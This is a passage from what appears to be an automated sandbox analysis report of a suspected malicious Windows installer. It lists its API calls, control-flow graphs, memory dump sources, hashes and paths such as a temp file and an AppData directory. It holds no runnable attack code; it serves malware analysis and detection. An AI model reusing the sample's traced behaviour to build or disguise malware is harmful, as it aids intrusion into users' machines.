                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 3449924974-1876063424
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 976 701a1777-701a17b6 call 701a1b5f 980 701a17bc-701a17c0 976->980 981 701a18d6-701a18d8 976->981 982 701a17c9-701a17d6 call 701a2394 980->982 983 701a17c2-701a17c8 call 701a2352 980->983 988 701a17d8-701a17dd 982->988 989 701a1806-701a180d 982->989 983->982 992 701a17f8-701a17fb 988->992 993 701a17df-701a17e0 988->993 990 701a180f-701a182b call 701a2569 call 701a15b4 call 701a1272 GlobalFree 989->990 991 701a182d-701a1831 989->991 1016 701a1885-701a1889 990->1016 994 701a187e-701a1884 call 701a2569 991->994 995 701a1833-701a187c call 701a15c6 call 701a2569 991->995 992->989 996 701a17fd-701a17fe call 701a2d37 992->996 998 701a17e8-701a17e9 call 701a2aac 993->998 999 701a17e2-701a17e3 993->999 994->1016 995->1016 1010 701a1803 996->1010 1007 701a17ee 998->1007 1004 701a17f0-701a17f6 call 701a2724 999->1004 1005 701a17e5-701a17e6 999->1005 1015 701a1805 1004->1015 1005->989 1005->998 1007->1010 1010->1015 1015->989 1019 701a188b-701a1899 call 701a252c 1016->1019 1020 701a18c6-701a18cd 1016->1020 1026 701a189b-701a189e 1019->1026 1027 701a18b1-701a18b8 1019->1027 1020->981 1023 701a18cf-701a18d0 GlobalFree 1020->1023 1023->981 1026->1027 1029 701a18a0-701a18a8 1026->1029 1027->1020 1028 701a18ba-701a18c5 call 701a153d 1027->1028 1028->1020 1029->1027 1030 701a18aa-701a18ab FreeLibrary 1029->1030 1030->1027
                                                                                                              APIs
                                                                                                                • Part of subcall function 701A1B5F: GlobalFree.KERNEL32(?), ref: 701A1DB2
                                                                                                                • Part of subcall function 701A1B5F: GlobalFree.KERNEL32(?), ref: 701A1DB7
                                                                                                                • Part of subcall function 701A1B5F: GlobalFree.KERNEL32(?), ref: 701A1DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A1825
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 701A18AB
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A18D0
                                                                                                                • Part of subcall function 701A2352: GlobalAlloc.KERNEL32(00000040,?), ref: 701A2383
                                                                                                                • Part of subcall function 701A2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701A17F6,00000000), ref: 701A27F4
                                                                                                                • Part of subcall function 701A15C6: wsprintfW.USER32 ref: 701A15F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3962662361-3916222277
                                                                                                              • Opcode ID: fdd854621d602701c97ac64772dd92b6b7132a7e490e4cb18af5debaaa902c6e
                                                                                                              • Instruction ID: 20f23281628ea9c9b7185ab5c180fb5f2851ea237fbc9e69a72f86cddbbb23ad
                                                                                                              • Opcode Fuzzy Hash: fdd854621d602701c97ac64772dd92b6b7132a7e490e4cb18af5debaaa902c6e
                                                                                                              • Instruction Fuzzy Hash: 5241A2FA900204AACB119F74DD85B9E37BCBF05310F264579FD07AAA86DBBC9584C760

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1033 4032de-403306 GetTickCount 1034 403436-40343e call 402e8e 1033->1034 1035 40330c-403337 call 40345d SetFilePointer 1033->1035 1040 403440-403444 1034->1040 1041 40333c-40334e 1035->1041 1042 403350 1041->1042 1043 403352-403360 call 403447 1041->1043 1042->1043 1046 403366-403372 1043->1046 1047 403428-40342b 1043->1047 1048 403378-40337e 1046->1048 1047->1040 1049 403380-403386 1048->1049 1050 4033a9-4033c5 call 406943 1048->1050 1049->1050 1051 403388-4033a8 call 402e8e 1049->1051 1056 403431 1050->1056 1057 4033c7-4033cf 1050->1057 1051->1050 1058 403433-403434 1056->1058 1059 4033d1-4033d9 call 405f90 1057->1059 1060 4033f2-4033f8 1057->1060 1058->1040 1064 4033de-4033e0 1059->1064 1060->1056 1061 4033fa-4033fc 1060->1061 1061->1056 1063 4033fe-403411 1061->1063 1063->1041 1065 403417-403426 SetFilePointer 1063->1065 1066 4033e2-4033ee 1064->1066 1067 40342d-40342f 1064->1067 1065->1034 1066->1048 1068 4033f0 1066->1068 1067->1058 1068->1063
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                              • SetFilePointer.KERNELBASE(00164C05,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$CountTick
                                                                                                              • String ID: )@
                                                                                                              • API String ID: 1092082344-1834664782
                                                                                                              • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                              • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                              • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1069 4023e4-402415 call 402c41 * 2 call 402cd1 1076 402ac5-402ad4 1069->1076 1077 40241b-402425 1069->1077 1079 402427-402434 call 402c41 lstrlenW 1077->1079 1080 402438-40243b 1077->1080 1079->1080 1083 40243d-40244e call 402c1f 1080->1083 1084 40244f-402452 1080->1084 1083->1084 1086 402463-402477 RegSetValueExW 1084->1086 1087 402454-40245e call 4031d6 1084->1087 1091 402479 1086->1091 1092 40247c-40255d RegCloseKey 1086->1092 1087->1086 1091->1092 1092->1076 1094 40288b-402892 1092->1094 1094->1076
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswC272.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseValuelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswC272.tmp
                                                                                                              • API String ID: 2655323295-1941657334
                                                                                                              • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                              • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                              • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1095 405f0d-405f19 1096 405f1a-405f4e GetTickCount GetTempFileNameW 1095->1096 1097 405f50-405f52 1096->1097 1098 405f5d-405f5f 1096->1098 1097->1096 1099 405f54 1097->1099 1100 405f57-405f5a 1098->1100 1099->1100
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-1331003597
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Iw\Antndelsens,?,00000000,000000F0), ref: 0040164D
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Iw\Antndelsens, xrefs: 00401640
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Antndelsens
                                                                                                              • API String ID: 1892508949-982084275
                                                                                                              • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                              • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                              • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseQueryValue
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3356406503-1824292864
                                                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                              • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
